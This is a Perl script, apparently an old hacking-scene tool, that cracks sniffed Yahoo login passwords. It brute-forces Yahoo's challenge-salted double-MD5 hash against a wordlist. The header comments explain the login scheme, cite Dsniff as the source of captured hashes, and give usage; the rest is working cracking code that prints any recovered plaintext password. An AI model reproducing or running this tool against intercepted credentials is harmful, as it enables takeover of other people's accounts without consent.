#!/usr/bin/perl # # By: GrassMunk # # ||Info//Background|| # This program uses a dictionary file to crack sniffed yahoo passwords. # ( like those seen from Dsniff ) # # //Code from Yahoo login page # var passwd = form.passwd.value; # var hash1 = MD5(form.passwd.value); # var challenge = form[".challenge"].value; # var hash2 = MD5(form.passwd.value) + challenge; # var hash; # if(form.passwd.value){ # hash=MD5(hash2); # } # as you can see the above code is used to create a hash value for # your password so that its not sent plaintext over the internet. # This is great, but scince we want to know what the clear text # password is we use this program to calculate it. # # OK, next you may say "Why would i use this when MD5 Crack programs # exist?" Well smart ass ill tell you why, you see that extra "+ challenge" # up there, its adding a "nonce" (look it up) to add an extra level of # 'security'. What this means is that MD5 Crack won't work because it # doesnt use the nonce to crack the MD5 password. # # ||Usage|| # ./YahooPWD.pl -p -c -d # # ||Note|| # The dictionary file must have each individual word on a seperate line. # A good example are the files from: # http://www.mirrors.wiretapped.net/security/info/reference/wordlists/ # It will not work properlly if the words are all on one line and are # seperated by a coma, space etc. # # # ||DISCLAIMER|| # This program comes with NO guaruntee ( or spell checker ). You are # free to use it however you want but I don't guaruntee that it will # work forever. Infact it wouldn't take much on Yahoos' side to make # this script unusable. Also, if this script causes ANY harm to your # computer I can in no way be held responsible. Youve gotta be some # kind of stupid to be able to break your hardware with this little # script. But I cannot be blamed for anything you do so don't even # bother. # # use Digest::MD5 qw(md5_hex); use Term::ANSIColor; # This is used to add some colour. You dont like it? then add a # to this line and every line that begins with ' print color ' Theres alot of em :) use Getopt::Std; my $challenge; my $Password; my $guessword; my $counter=0; #Print Header print color 'bold yellow'; print "\n--\t $0 \t\t--\n--\tMaker:"; print color 'bold green'; print " GrassMunk\t"; print color 'bold yellow'; print "--\n"; #Print Usage if no arguments are supplied if (! defined $ARGV[0]) { print color 'bold blue'; print "\nUsage: "; print color 'bold yellow'; print "$0 "; print color 'bold red'; print "-p -c -d "; print " \n\n"; print color 'reset'; exit 0; } # get the options from the console getopts('c:p:d:'); $challenge = $opt_c; $Password = $opt_p; $dictionary = $opt_d; print "Using dictionary file: $dictionary\n"; open(DICTIONARY, $dictionary) || die("Could not open file $dictionary. Maybe the path is wrong or you do not have read permission. Error: $! \n"); while($guessword = ) { s/#.*//; # ignore comments by erasing them chomp($guessword); # remove newlines $digest = md5_hex($guessword); # Create digest $digest .= $challenge; # add the challenge to it $digest = md5_hex($digest); # re-Create it if($digest eq $Password) { print color 'bold red'; print "Password Found\n"; print color 'bold white'; print "The Password is: $guessword\n"; print "\n"; print color 'reset'; close(DICTIONARY); exit 0; } if(!($counter % 10000) ) { # Print the word on every 10 000th line print color 'bold green'; print "Word #$counter \t"; print color 'bold blue'; print "$digest"; print color 'bold green'; print " :: "; print color 'bold white'; print "$guessword\n"; } $counter++; } print "\n"; print color 'reset'; close(DICTIONARY); #EOF